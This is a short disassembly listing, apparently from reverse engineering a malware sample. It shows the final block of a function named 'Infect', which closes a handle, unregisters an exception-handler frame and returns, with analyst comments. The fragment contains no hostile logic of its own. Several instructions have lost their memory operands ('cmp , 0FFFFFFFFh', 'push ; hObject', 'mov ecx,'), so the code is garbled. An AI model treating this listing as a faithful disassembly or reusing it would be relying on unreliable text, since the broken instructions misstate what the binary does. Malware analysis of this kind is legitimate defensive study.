.text:004071FC loc_4071FC: ; CODE XREF: Infect+6BBj
.text:004071FC cmp , 0FFFFFFFFh
.text:00407200 jz short loc_40720B
.text:00407202 push ; hObject
.text:00407205 call ds:CloseHandle
.text:0040720B
.text:0040720B loc_40720B: ; CODE XREF: Infect+6CAj
.text:0040720B or , 0FFFFFFFFh
.text:0040720F
.text:0040720F loc_40720F: ; CODE XREF: Infect+69Fj
.text:0040720F mov ecx,
.text:00407212 mov large fs:0, ecx ; unregister the SEH frame set up at 406B4C
.text:00407219 pop edi
.text:0040721A pop esi
.text:0040721B pop ebx
.text:0040721C leave
.text:0040721D retn 4 ; stdcall, one argument
.text:0040721D Infect endp